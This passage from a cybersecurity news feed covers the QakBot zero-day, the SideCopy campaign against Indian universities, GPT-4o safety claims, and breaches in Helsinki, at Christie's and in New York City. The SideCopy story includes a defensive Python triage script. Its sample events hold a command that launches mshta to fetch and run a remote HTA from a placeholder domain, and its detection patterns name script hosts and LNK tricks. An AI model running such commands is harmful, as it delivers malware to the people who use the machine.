and social justice. Through collective efforts and ongoing collaboration, the global community can build a more resilient and secure cyber environment for all.

Microsoft Addresses Zero-Day Vulnerability Exploited by QakBot Malware

Microsoft patched a zero-day vulnerability exploited by attackers to distribute QakBot and other malware payloads on susceptible Windows systems. Identified as CVE-2024-30051, this vulnerability is a privilege escalation flaw resulting from a heap-based buffer overflow in the Desktop Window Manager (DWM) core library. Successful exploitation grants attackers “SYSTEM privileges,” Microsoft said.
“These types of bugs are usually combined with a code execution bug to take over a target and are often used by ransomware (actors),” said Dustin Childs of the Zero Day Initiative.
Introduced in Windows Vista, the Desktop Window Manager (dwm.exe) is a compositing window manager that renders all GUI effects in Windows like transparent windows, live taskbar thumbnails, Flip3D, and even high-resolution monitor support. Applications do not draw directly on the screen. Instead, they write their window images to a specific spot in memory. Windows then combines and creates a “composite” of all these windows into one view before sending it to the monitor. This allows Windows to add effects like transparency and animations while displaying the windows. Kaspersky researchers uncovered this vulnerability while investigating another Windows DWM Core Library privilege escalation bug tracked as CVE-2023-36033, also exploited as a zero-day in attacks. While analyzing data related to recent exploits and associated attacks, Kaspersky researchers discovered an intriguing file uploaded to VirusTotal on April 1. The file's name hinted that it contained details on a Windows vulnerability. The file had information regarding a Windows DWM vulnerability – written in broken English - that could be exploited to escalate privileges to SYSTEM level, with the exploitation process nearly mirroring the one used in CVE-2023-36033 attacks, “but the vulnerability was different,” researchers said. Initially skeptical due to the document's quality and lack of crucial details on exploiting the vulnerability, further investigation confirmed the legitimacy of another zero-day vulnerability capable of privilege escalation. Kaspersky promptly reported it to Microsoft, leading to its designation as CVE-2024-30051 and subsequent patching in this month’s Patch Tuesday.

Zero-Day Exploited by QakBot

Following the reporting to Microsoft, Kaspersky continued monitoring for exploits and attacks leveraging this flaw.
“In mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with QakBot and other malware and believe that multiple threat actors have access to it,” Kaspersky said.
Security researchers at Google Threat Analysis Group, DBAPPSecurity WeBin Lab, and Google-owned Mandiant also reported the zero-day to Microsoft, pointing to likely widespread exploitation in malware attacks, Childs said.
“Don’t wait to test and deploy this update as exploits are likely to increase now that a patch is available to reverse engineer,” said Childs.
The U.S. Cybersecurity and Infrastructure Security Agency also added CVE-2024-30051 to its Known Exploited Vulnerabilities catalog and directed all federal agencies to complete the patching process by June 4. Kaspersky plans to disclose technical specifics of CVE-2024-30051 once users have had adequate time to update their Windows systems.

QakBot’s Journey from Banking Trojan to Initial Access Broker

QakBot, also known as Qbot, emerged as a banking trojan in 2008 and was used to steal credentials, website cookies, and credit cards to commit financial fraud. Over the years, QakBot's operators evolved into initial access brokers, partnering with other threat groups to provide initial access to enterprise and home networks for ransomware attacks, espionage, and data theft. QakBot's infrastructure was taken down in August 2023 following a multinational law enforcement operation spearheaded by the FBI and known as "Operation Duck Hunt." But Microsoft identified the resurgence of QakBot in phishing campaigns targeting the hospitality industry in December. Law enforcement linked QakBot infections to 700,000 victim computers, including ransomware attacks targeting businesses, healthcare providers, and government agencies worldwide, which according to conservative estimates caused hundreds of millions of dollars in damage. Throughout the years, QakBot served as an initial infection vector for various ransomware gangs and their affiliates, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and most recently Black Basta.

Another Zero-Day Fix

Microsoft patched 59 CVEs in its May 2024 Patch Tuesday release, with one rated "critical," 57 rated "important" and one rated "moderate." The release also contains a fix for another zero-day flaw, other than the one exploited by QakBot. The other bug, tracked as CVE-2024-30040, is rated "important" on the CVSS scale and is a Windows MSHTML platform security feature bypass vulnerability. MSHTML is the proprietary browser engine used by the Microsoft Windows version of Internet Explorer.
“This vulnerability bypasses OLE mitigations in Microsoft 365 and Microsoft Office which protect users from vulnerable COM/OLE controls,” Microsoft said.
A hacker who socially engineers a victim into opening a malicious document would be able to execute arbitrary code by bypassing OLE mitigations in the Microsoft suite of office applications.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

SideCopy APT Campaign Found Targeting Indian Universities

By: Alan J
15 May 2024 at 03:48

Cyble Research and Intelligence Labs (CRIL) researchers have uncovered a new SideCopy campaign. The threat actor group has previously been observed targeting South Asian nations with a particular focus on government and military targets in India and Afghanistan. Active since May 2023, the campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents. Ultimately, the campaign deploys malware payloads such as Reverse RAT and Action RAT, granting attackers extensive control over infected devices. The research explores the tactics employed by SideCopy, such as their recent focus on university students, and potential overlap in activities with the Transparent Tribe APT group.

Technical Analysis of the SideCopy Campaign Infection Chain

In early May, CRIL identified a malicious domain employed by the SideCopy group in their operations. The website was discovered hosting a ZIP archive file named "files.zip" that contained sub-directories labeled "economy," "it," and "survey." The survey directory included files similar to those previously employed by SideCopy in their earlier campaigns.

[Image: SideCopy campaign, Transparent Tribe. Source: Cyble]

The campaign likely employs spam emails to distribute the malicious ZIP archive hosted on the compromised website as the initial infection vector. These archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." Upon execution, the LNK files trigger a series of commands that proceed to download and execute a malicious HTA file. The downloaded HTA files contain embedded payloads within additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics to appear legitimate to the targeted demographic.

[Image: SideCopy campaign infection chain. Source: Cyble Blog]

[Image: SideCopy campaign infection chain, antivirus bypass. Source: Cyble Blog]

The malware is crafted to adapt to the presence of different antivirus software such as Avast, Kaspersky and Bitdefender, which further amplifies its ability to evade detection, and it ensures persistence by placing the LNK shortcut files in the startup folder. The attack process ultimately leads to the deployment of malicious payloads such as Reverse RAT and Action RAT onto the victim system, which then connect to a remote Command-and-Control (C&C) server to commence malicious activities.

Intersection with Transparent Tribe Activities

The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at possible collaboration or shared objectives between the two groups, with researchers previously noting that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate the tactics of the Sidewinder APT group in the distribution of malware files, such as the use of disguised LNK files to initiate a complex chain of infections. CRIL researchers have advised the use of strong email filtering systems, the exercise of caution, the deployment of network-level monitoring, and the disabling of scripting hosts such as PowerShell, MSHTA and cmd.exe to defend against this potential threat.
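The infection chain and the mitigations CRIL recommends suggest a few simple host-level detections. The following is an added example, not code from Cyble or CRIL: a Python triage script that runs these heuristics over a constructed file listing and constructed process-creation events. The sample paths, the `lure.example` domain and the rule names are assumptions made for the example, not indicators from the report. It flags LNK files carrying a document double extension such as "IT Trends.docx.lnk", LNK files placed in the user's Startup folder, and script hosts (mshta.exe, PowerShell, cmd.exe) launched with a remote URL on their command line.

```python
"""Heuristic triage for the SideCopy-style LNK -> HTA chain described above.

Added example, not Cyble/CRIL code. The sample file paths and events below are
constructed; 'lure.example' is a placeholder domain, not a real indicator.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Document extensions commonly used to disguise a shortcut as a document.
DOC_EXTS = ("doc", "docx", "pdf", "xls", "xlsx", "ppt", "pptx", "txt")
DOUBLE_EXT_LNK = re.compile(r"\.(?:%s)\.lnk$" % "|".join(DOC_EXTS), re.IGNORECASE)

# Per-user Startup folder: any shortcut dropped here runs at every logon.
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)

# Script hosts CRIL advises restricting, plus a URL pattern for remote payload fetches.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str       # which heuristic fired
    evidence: str   # the path or command line that triggered it


def triage_files(paths):
    """Flag lure-style and persistence-style LNK files in a file inventory."""
    findings = []
    for path in paths:
        if DOUBLE_EXT_LNK.search(path):
            findings.append(Finding("lnk_double_extension", path))
        if STARTUP_LNK.search(path):
            findings.append(Finding("lnk_startup_persistence", path))
    return findings


def triage_events(events):
    """Flag script hosts started with a remote URL argument (HTA download-and-run)."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if image in SCRIPT_HOSTS and REMOTE_URL.search(ev["cmdline"]):
            findings.append(Finding("script_host_remote_url", ev["cmdline"]))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'lnk_double_extension': 2}."""
    return dict(Counter(f.rule for f in findings))


# --- Constructed sample input (not real telemetry) -------------------------
SAMPLE_FILES = [
    r"C:\Users\student\Downloads\files\survey\IT Trends.docx.lnk",
    r"C:\Users\student\Downloads\files\economy\Budget 2024.pdf.lnk",
    r"C:\Users\student\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk",
    r"C:\Users\student\Documents\thesis.docx",
    r"C:\Users\student\Desktop\Notes.lnk",   # ordinary shortcut: must not fire
]

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c start /min mshta.exe https://lure.example/notice.hta"},
    {"parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://lure.example/notice.hta"},
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": '"WINWORD.EXE" thesis.docx'},                       # benign
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem"},         # local only
]

if __name__ == "__main__":
    all_findings = triage_files(SAMPLE_FILES) + triage_events(SAMPLE_EVENTS)
    for f in all_findings:
        print(f"[{f.rule}] {f.evidence}")
    print(summarize(all_findings))
```

Fed an EDR file inventory and Sysmon- or 4688-style process events, the Startup-folder rule is the highest-signal one, since legitimate shortcuts rarely appear there after software installation; the double-extension rule is useful because Explorer never shows the .lnk extension, so "IT Trends.docx.lnk" looks like a Word document to the user.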

Cybersecurity Concerns Surround ChatGPT 4o’s Launch; Open AI Assures Beefed up Safety Measure

The field of Artificial Intelligence is rapidly evolving, and OpenAI's ChatGPT is a leader in this revolution. This groundbreaking large language model (LLM) redefined the expectations for AI. Just 18 months after its initial launch, OpenAI has released a major update: GPT-4o. This update widens the gap between OpenAI and its competitors, especially the likes of Google. OpenAI unveiled GPT-4o, with the "o" signifying "omni," during a live stream earlier this week. This latest iteration boasts significant advancements across various aspects. Here's a breakdown of the key features and capabilities of OpenAI's GPT-4o.

Features of GPT-4o

  • Enhanced Speed and Multimodality: GPT-4o operates at a faster pace than its predecessors and excels at understanding and processing diverse information formats (written text, audio, and visuals). This versatility allows GPT-4o to engage in more comprehensive and natural interactions.
  • Free Tier Expansion: OpenAI is making AI more accessible by offering some GPT-4o features to free-tier users. This includes the ability to access web-based information during conversations, discuss images, upload files, and even utilize enterprise-grade data analysis tools (with limitations). Paid users will continue to enjoy a wider range of functionalities.
  • Improved User Experience: The blog post accompanying the announcement showcases some impressive capabilities. GPT-4o can now generate convincingly realistic laughter, potentially pushing the boundaries of the uncanny valley and increasing user adoption. Additionally, it excels at interpreting visual input, allowing it to recognize sports on television and explain the rules, a valuable feature for many users.

However, despite the new features and capabilities, the potential misuse of ChatGPT is still on the rise. The new version, though deemed safer than the previous versions, is still vulnerable to exploitation and can be leveraged by hackers and ransomware groups for nefarious purposes. Addressing the security concerns regarding the new version, OpenAI shared a detailed post about the new and advanced security measures being implemented in GPT-4o.

Security Concerns Surround ChatGPT 4o

The implications of ChatGPT for cybersecurity have been a hot topic of discussion among security leaders and experts as many worry that the AI software can easily be misused. Since its inception in November 2022, several organizations such as Amazon, JPMorgan Chase & Co., Bank of America, Citigroup, Deutsche Bank, Goldman Sachs, Wells Fargo and Verizon have restricted access or blocked the use of the program citing security concerns. In April 2023, Italy became the first country in the world to ban ChatGPT after accusing OpenAI of stealing user data. These concerns are not unfounded.

OpenAI Assures Safety

OpenAI reassured users that GPT-4o has "new safety systems to provide guardrails on voice outputs," plus extensive post-training and filtering of the training data to prevent ChatGPT from saying anything inappropriate or unsafe. GPT-4o was built in accordance with OpenAI's internal Preparedness Framework and voluntary commitments. More than 70 external security researchers red teamed GPT-4o before its release. In an article published on its official website, OpenAI states that its evaluations of cybersecurity do not score above "medium risk."

"GPT-4o has safety built-in by design across modalities, through techniques such as filtering training data and refining the model's behavior through post-training. We have also created new safety systems to provide guardrails on voice outputs. Our evaluations of cybersecurity, CBRN, persuasion, and model autonomy show that GPT-4o does not score above Medium risk in any of these categories," the post said.

"This assessment involved running a suite of automated and human evaluations throughout the model training process. We tested both pre-safety-mitigation and post-safety-mitigation versions of the model, using custom fine-tuning and prompts, to better elicit model capabilities," it added.

OpenAI shared that it also employed the services of over 70 experts to identify risks and amplify safety. "GPT-4o has also undergone extensive external red teaming with 70+ external experts in domains such as social psychology, bias and fairness, and misinformation to identify risks that are introduced or amplified by the newly added modalities. We used these learnings to build out our safety interventions in order to improve the safety of interacting with GPT-4o. We will continue to mitigate new risks as they're discovered," it said.

Hackers Exploit Unpatched Bug in Helsinki Education Division Data Breach

Hackers exploited an unpatched remote access server vulnerability in the Helsinki education division data breach to scour through records of 80,000 students, their guardians, and all administrative personnel. The City of Helsinki detected the data breach on April 30, promptly initiating an investigation that found the hacker had gained access to student and personnel usernames and email addresses. Hannu Heikkinen, the chief digital officer of the City of Helsinki, said in a Monday press conference, "Further investigation has shown that the perpetrator has gained access to the usernames and email addresses of all city personnel, as well as the personal IDs and addresses of students, guardians and personnel from the Education Division."
“Additionally, the perpetrator has also gained access to content on network drives belonging to the Education Division,” Heikkinen said.
“This is a very serious data breach, with possible, unfortunate consequences for our customers and personnel,” said City Manager Jukka-Pekka Ujula. “We regret this situation deeply.”

Helsinki Education Division Data Breach Linked to Remote Access Bug

The preliminary investigation found that the Helsinki Education Division data breach was possible due to a vulnerability in a remote access server.
“The server had a vulnerability which the culprit was able to exploit to connect to the Education Division network.”
The city authorities did not reveal the name of the remote access server but said that a hotfix patch was available at the time of exploitation; why it was not installed on the server is currently unknown.
“Our security update and device maintenance controls and procedures have been insufficient,” said Heikkinen.
The breach targeted an extensive group, with most of the network drive data, comprising tens of millions of files, containing non-identifying information or ordinary personal data, minimizing potential abuse, according to the city authorities. However, some files include confidential or sensitive personal data such as fees for early childhood education customers, children's status information like information requests by student welfare or information about the need for special support, medical certificates regarding the suspension of studies for upper secondary students, and sick leave records of Education Division personnel. The data breach also includes historical customer and personnel data, meaning that even if an individual is not currently a customer or a member of staff at the Education Division, the hacker may still have accessed their data.
“Considering the number of users in the city’s services now and in previous years, in the worst case, this data breach affects over 80,000 students and their guardians,” Ujula said.
Satu Järvenkallas, executive director of the Education Division, said the authorities are currently unable to provide an accurate assessment of what data the hacker may have accessed as “the volume of data under investigation is significant.”

VPN Gateways, Network Edge Devices Need ‘Special Attention’

City officials immediately notified the Data Protection Ombudsman, the Finnish Police, and Traficom's National Cyber Security Centre after the discovery of the data breach at Helsinki's Education Division. Traficom's cybersecurity center acknowledged the notification and said it was supporting the City of Helsinki in investigating the case. "The data breach that targeted the City of Helsinki is exceptionally large for the municipal sector. The case affects many Finns and causes great concern," it said on platform X (formerly known as Twitter). Critical vulnerabilities in network edge devices like this one pose a risk to organizations' cybersecurity, said Traficom's NCSC. By exploiting vulnerabilities in VPN products intended for establishing secure remote connections, it is also possible for parties outside the organization to gain access to internal networks, "especially if other measures to limit the attack are not in use," it added.
“Severe and easy-to-exploit vulnerabilities have been detected in the network edge devices of many major device manufacturers, such as VPN gateways, in the past six months,” said Samuli Bergström, the director of the cybersecurity center. “That is why it is important that special attention is paid to resources and expertise in organizations.”
A very recent example of one such VPN appliance abuse is the zero-day exploitation of Ivanti VPN products, Ivanti Connect Secure (formerly Pulse Secure) and Ivanti Policy Secure gateways. Chinese state-backed hackers used two zero-day vulnerabilities in these products, an authentication bypass (CVE-2023-46805) and a command injection bug (CVE-2024-21887), to compromise several organizations including MITRE.

"Reaction to the data breach has been quick and all the necessary resources are being and will be used on protective measures. This is the highest priority for the city's senior management," Ujula said. "After the breach, we have taken measures to ensure that a similar breach is no longer possible," Heikkinen added.
“We have not discovered evidence that the perpetrator would have accessed the networks or data of other divisions. However, we are monitoring all City of Helsinki networks closely.”
Information for affected individuals is available via Traficom's Cybersecurity Centre website, the data breach customer service, crisis emergency services and MIELI Mental Health Finland.

The Cyber Express Sets the Stage to Host World CyberCon META Edition 2024 in Dubai 

This May, the heartbeat of the cybersecurity industry will resonate through Dubai, where The Cyber Express is set to host the much-anticipated third iteration of the World CyberCon META Edition 2024. Scheduled for May 23, 2024, at Habtoor Palace Dubai, this premier event promises a comprehensive day filled with immersive experiences tailored to address the dynamic challenges and innovations in cybersecurity. This year's theme, "Securing Middle East's Digital Future: Challenges and Solutions," lays the foundation for a unique gathering that is crucial for any professional navigating the cybersecurity landscape. The World CyberCon META Edition will feature a stellar lineup of more than 40 prominent Chief Information Security Officers (CISOs) and other cybersecurity leaders who will share invaluable insights and strategies. Notable speakers include:
  • Sithembile (Nkosi) Songo, CISO, ESKOM  
  • Dina Alsalamen, VP, Head of Cyber and Information Security Department, Bank ABC  
  • Anoop Kumar, Head of Information Security Governance Risk & Compliance, Gulf News  
  • Irene Corpuz, Cyber Policy Expert, Dubai Government Entity, Board Member, and Co-Founder, Women in Cyber Security Middle East (WiCSME)   
  • Abhilash Radhadevi, Head of Cybersecurity, OQ Trading  
  • Ahmed Nabil Mahmoud, Head of Cyber Defense and Security Operations, Abu Dhabi Islamic Bank 

The World CyberCon META Edition 2024

[Image: World CyberCon META Edition 2024. Highlights from the 2023 World CyberCon in Mumbai.]

A Comprehensive Platform for Learning & Innovation

The World CyberCon META Edition 2024 promises a rich agenda with topics ranging from the nuances of national cybersecurity strategies to the latest in threat intelligence and protection against advanced threats. Discussions will span a variety of crucial subjects including:
  • Securing a Digital UAE: National Cybersecurity Strategy 
  • Predictive Cyber Threat Intelligence: Anticipating Tomorrow’s Attacks Today 
  • Navigating the Cyber Threat Terrain: Unveiling Innovative Approaches to Cyber Risk Scoring 
  • Fortifying Against Ransomware: Robust Strategies for Prevention, Mitigation, and Swift Recovery 
  • Strategic Investments in Cybersecurity: Leveraging AI and ML for Enhanced Threat Detection 
Who Should Attend?

The World CyberCon META Edition 2024 is tailored for CISOs, CIOs, CTOs, security auditors, heads of IT, cybercrime specialists, and network engineers. It's an invaluable opportunity for those invested in the future of internet safety to gain insights, establish connections, and explore new business avenues.

Engage and Network

In addition to knowledge sessions, the conference will feature interactive workshops, an engaging exhibition zone, and plenty of networking opportunities. This event is set to honor the significant contributions of cybersecurity professionals and provide them with the recognition they deserve.

Secure Your Place

Don't miss this unique chance to connect with leading professionals and gain insights from the forefront of cybersecurity. Reserve your spot at World CyberCon META Edition 2024 by visiting https://thecyberexpress.com/cyber-security-events/world-cybercon-3rd-edition-meta/.

More Information

For more details on the event sponsorship opportunities and delegate passes, please contact Ashish Jaiswal at ashish.j@thecyberexpress.com.

About The Cyber Express

Stay informed with TheCyberExpress.com, your essential source for cybersecurity news, insights, and resources, dedicated to empowering you with the knowledge needed to protect your digital assets.

Join us in shaping the digital future at World CyberCon META Edition 2024 in Dubai. Let's secure tomorrow together!

R00TK1T Group Intensifies Cyberattacks on Egyptian Firms After Clash with Anonymous Egypt

In the latest twist of the cyber warfare between the Anonymous Egypt group and R00TK1T hackers, the latter has turned up the heat on Egyptian soil, accusing the Anonymous Egypt group of content theft. In a dark web post, R00TK1T has vowed to intensify cyberattacks on Egypt, targeting major infrastructure and organizations within the nation. The retaliation was swift and severe, starting with cyber assaults on the Ministry of Supply and Internal Trade in Egypt and a prominent software company with operations in Egypt. The hackers used the same methods to target all the alleged victims and left several messages on their data leak channel condemning the Anonymous Egypt group, stating, "Anonymous Egypt made a grave mistake thinking they could outsmart us. Now, it's time to show them the true power of our skills."

R00TK1T's Cyberattacks on Egypt Post Anonymous Egypt Confrontation

[Image: R00TK1T's cyberattacks on Egypt. Source: Dark Web]

In a declaration on the dark web, R00TK1T proclaimed, "Security Is Just An Illusion, Privacy Is Just Another Illusion." They warned of impending chaos, signaling their determination to disrupt the status quo. Their message resonated with defiance: "F*ck Society & The System! We Are R00TK1T Will Be Anywhere Anytime!" The Ministry of Supply and Internal Trade was among the first victims that allegedly fell prey to R00TK1T's infiltration, with the group proudly flaunting evidence of their access to the ministry's most secure networks.

[Image: R00TK1T ISC CyberTeam. Source: X]

As images surfaced showcasing the depth of their intrusion, it became clear that R00TK1T's retaliation was directed not only against the hacker group but against the whole of Egypt.

R00TK1T Cyberattacks Intensify

[Image: CorporateStack cyberattack. Source: X]

But these cyberattacks on Egyptian companies didn't end there. CorporateStack, a renowned company specializing in digital transformation solutions, also fell victim to an alleged cyberattack by the hacker group. With clients like Bentley, Vodafone, and Hexa, CorporateStack was a prime target for R00TK1T's message: no entity was beyond their reach. The group's infiltration into CorporateStack's systems sent a clear message to businesses operating in Egypt.

This is an ongoing story and The Cyber Express will be closely monitoring the situation. We'll update this post once we have more information on the alleged cyberattacks on Egypt by the hacker group or any official confirmation from the organizations listed by R00TK1T hackers.

HPE Aruba Vulnerabilities: Prevent Systems From RCE Attacks

13 May 2024 at 03:00

Recently, HPE Aruba Networking, formerly known as Aruba Networks, has encountered significant security challenges. Vulnerabilities in their ArubaOS, the proprietary network operating system, have been identified, posing serious risks, including remote code execution (RCE). In this article, we delve into the details of these HPE Aruba vulnerabilities, their implications, and the recommended actions to mitigate […]

The post HPE Aruba Vulnerabilities: Prevent Systems From RCE Attacks appeared first on TuxCare.

The post HPE Aruba Vulnerabilities: Prevent Systems From RCE Attacks appeared first on Security Boulevard.

Christie’s Auction Website Hacked Just Before Major Sales

By: Alan J
13 May 2024 at 06:27

Just days before its highly anticipated spring art auctions, Christie's, the renowned auction house, fell victim to a cyberattack, taking its website offline and raising concerns about the security of client data. The Christie's auction house cyberattack has sent shockwaves through the art world, with collectors, advisers, and dealers scrambling to adapt to the sudden disruption. Christie's is a British auction house founded in 1766 by James Christie, offering around 350 different auctions annually in over 80 categories, such as decorative and fine arts, jewelry, photographs, collectibles, and wine. The auction house has a global presence in 46 countries, with 10 salerooms worldwide, including London, New York, Paris, Geneva, Amsterdam, Hong Kong, and Shanghai. The company provided a temporary webpage after its official website was taken down and later announced that the auctions would proceed despite the setbacks caused by the cyberattack.

Christie’s Auction House Cyberattack Occurs Ahead of Major Auctions

[Image: Christie's auction house cyberattack. Source: Shutterstock]

The cyberattack came at an inopportune time for Christie's, with several high-stakes auctions estimated at around $850 million in worth scheduled to take place in New York and Geneva. Art adviser Todd Levin highlighted the significance of the timing, expressing concern that the cyberattack was happening during a pivotal moment before the spring sales, when buyers confirm their interest in artworks. He raised a pressing question: "How can potential bidders access the catalog?" The auctions will include works by Warhol, Basquiat, and Claude Monet, and pieces from the Rosa de la Cruz Collection, which are expected to generate hundreds of millions of dollars in revenue. Christie's website was taken offline following the hack, which affected some of its systems. Despite the setback, Christie's has assured clients that the auctions will proceed as planned, with bidders able to participate in person, by phone, or through the Christie's Live platform. Christie's CEO Guillaume Cerutti assured clients that all eight live auctions in New York and Geneva would proceed as scheduled, with the exception of the Rare Watches sale, which was postponed to May 14th. In a statement, Cerutti elaborated: "I want to assure you that we are managing this incident according to our well-established protocols and practices, with the support of additional experts. This included, among other things, the proactive protection of our main website by taking it offline."

Growing Cybersecurity Concerns in the Art World

The incident is a sobering reminder of the increasing threat of cyberattacks in the art world. In recent years, several museums and art market platforms have fallen victim to hacking, highlighting the need for vigilance in protecting sensitive client information amid slumbering sales. Earlier in January, a service provider managing the online collections of several prominent museums was targeted, affecting institutions like The Museum of Fine Arts in Boston, the Rubin Museum of Art in New York, and the Crystal Bridges Museum of American Art. In 2023, Christie's had another security incident come to light when it was discovered to be inadvertently exposing the GPS locations and coordinates of several art pieces purchased by some of the world's biggest and wealthiest collectors, revealing their exact whereabouts. In 2017, hackers employed an email scam to intercept payments between dealers and clients, siphoning sums ranging from £10,000 to £1 million. These incidents underscore the art world's vulnerability to such threats. As the market becomes increasingly digital, auction houses and museums must take proactive steps to invest in stronger defenses against a rapidly evolving cyber threat landscape and the risks it may pose to the art industry.

Hacker Offers Data Allegedly Stolen from the City of New York

By: Alan J
13 May 2024 at 03:45

An unidentified threat actor known as "pwns3c" has offered for sale on BreachForums access to a database purported to contain sensitive data and documents from a City of New York data breach. The City of New York website is the official digital representation of the city's government and provides access to related information such as alerts, 311 services, news, programs and events in the city. The claims made in the post, despite their alleged nature, raise significant concerns about the extent of the data breach as well as the security practices followed by the government office.

Alleged City of New York Data Breach Claimed to Include Sensitive Data

The database is claimed to include 199 PDF files, approximately 70MB in size in total. The exposed data allegedly includes a wide range of personally identifiable information (PII), such as: Licensee Serial Number, Expiration Date, Applicant or Licensee Name, Trade Name, Street Address, City, Zip Code, Phone Number of Applicant, and Business Email of Applicant. Moreover, the data also reveals sensitive details about building owners, attorneys, and individuals, including their EIN, SSN, and signature. The threat actor is selling this sensitive information for a mere $30, and interested buyers are instructed to contact them through private messages within BreachForums or through their Telegram handle. The post seemingly includes links to download samples of the data allegedly stolen in the attack.

[Image: Alleged City of New York data breach. Source: BreachForums]

The alleged data breach has far-reaching implications, as it puts the personal information of numerous individuals at risk. The leak of personally identifiable information (PII) and sensitive documents exposes individuals to potential risks of identity theft, fraud, and other malicious activities. The Cyber Express team has reached out to the New York City mayor's official press contact email for confirmation. However, no response has been received as of yet.

pwns3c Earlier Claimed to have Hacked Virginia Department of Elections

In an earlier post on BreachForums, pwns3c claimed a data breach against the Virginia Department of Elections, allegedly compromising at least 6,500 records. That stolen data was also offered for USD 30 in Bitcoin (BTC), Litecoin (LTC), or Monero (XMR) on the dark web. The Virginia Department of Elections is responsible for providing and overseeing open and secure elections for the citizens of the Commonwealth of Virginia. It handles voter registration, absentee voting, ballot access for candidates, campaign finance disclosure and voting equipment certification in coordination with about 133 of Virginia's local election offices. The compromised data was alleged to include sensitive information such as timestamps, usernames, election data, candidate information, and voting method details. However, there has been no official confirmation of the stated incident as of yet.

The breaches claimed by pwns3c, despite their unverified nature, highlight the persistent challenges of securing the websites of government institutions. The sensitive nature of the stolen data, which may allegedly include Social Security Numbers (SSNs), contact information, election-related details, and signatures, underscores the urgency for government websites to strengthen their security measures.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

TCE Cyberwatch: Weekly Wrap on AI, Deepfakes, Cybersecurity Challenges Affecting Nations Worldwide

By: Alan J
12 May 2024 at 23:56

TCE Cyberwatch

This week on TCE Cyberwatch we’re covering the data breaches and vulnerabilities faced by various companies. Alongside this, the rise of countries using AI and deepfake technology, some consensual and some not, adds depth to the conversation surrounding the security of it all. TCE Cyberwatch aims to bring updates on both large-scale and small-scale events to keep our readers informed about the cybersecurity news that can affect them. Keep reading to learn about what’s currently trending in the industry.

Dropbox Sign data breached; customers’ authentication information stolen

Dropbox, a popular storage and file-sharing service, revealed that it had recently suffered a security breach that exposed sensitive information. Specifically, Dropbox Sign, its service for signing documents, was targeted. The stolen data belonged to Dropbox Sign users and included passwords, account settings, names, emails, and other authentication information. Dropbox has rotated and regenerated OAuth tokens and API keys to contain the fallout. Dropbox has assured that “from a technical perspective, Dropbox Sign’s infrastructure is largely separate from other Dropbox services. That said, we thoroughly investigated this risk and believe that this incident was isolated to Dropbox Sign infrastructure, and did not impact any other Dropbox products.” Read More

Cyberattacks on organizations in the UAE claimed by Five Families Alliance member, Stormous Ransomware

Stormous Ransomware has claimed responsibility for cyberattacks on several UAE entities. A ransomware group linked to the Five Families alliance, which is known for targeting UAE entities, Stormous Ransomware has targeted organisations such as the Federal Authority for Nuclear Regulation (FANR); Kids.ae, the government’s digital platform for children; the Telecommunications and Digital Regulatory Authority (TDRA); and more. After claiming responsibility for the attacks, the ransomware group demanded 150 BTC, which comes to around $6.7 million USD, and threatened to leak stolen data if the ransom was not paid. The organisations targeted by the group have yet to comment on the situation, and tensions are high given the damage these claims could cause. Read More

Russian bitcoin cybercriminal pleads guilty in the U.S. after arrest in France

Alexander Vinnik, a Russian cybercrime suspect, recently pleaded guilty to part of the charges against him in the U.S. Previously arrested in Greece in 2017, on charges of laundering $4 billion through the digital currency bitcoin, and later held in France, Vinnik is now set to face trial in California. Vinnik’s lawyer, Arkady Bukh, predicted that Vinnik could receive a prison term of less than 10 years as a result of the plea bargain. The U.S. Department of Justice accused Vinnik of having "allegedly owned, operated, and administrated BTC-e, a significant cybercrime and online money laundering entity that allowed its users to trade in bitcoin with high levels of anonymity and developed a customer base heavily reliant on criminal activity." Read More

Many Android apps on the Google Play Store found to carry a file-overwrite vulnerability

Popular Android applications have been found affected by a path-traversal-related vulnerability pattern. Called the Dirty Stream attack, it can be exploited through one of the flagged applications, leading to files being overwritten. The Microsoft Threat Intelligence team stated that “the implications of this vulnerability pattern include arbitrary code execution and token theft, depending on an application's implementation.” The affected apps are popular, with between 500 million and 1 billion downloads. Exploitation would have given an attacker control of the app and access to the user’s data, such as the accounts used with it. Microsoft is concerned that this is a wider problem and has asked developers to focus on security to protect sensitive information. Read More

Department of Social Welfare, Ladakh, in India, allegedly hacked, but no proof provided

Recently, a threat actor claimed to have hacked the database of the Department of Social Welfare Ladakh, Government of India. Their claims, however, appear to have no supporting evidence: no data was disclosed from their side and no sign of a breach was detected on the department’s website. If the claims are true, however, the fallout is predicted to be very damaging. Investigations into the claims are currently under way. As neither the motive nor the authenticity of the claim has been confirmed, swift detection and response is important both for the individuals whose data resides in the department’s database and for national security, in order to preserve the nation’s cybersecurity. Read More

U.K. military data breach endangers information of current, veteran military personnel

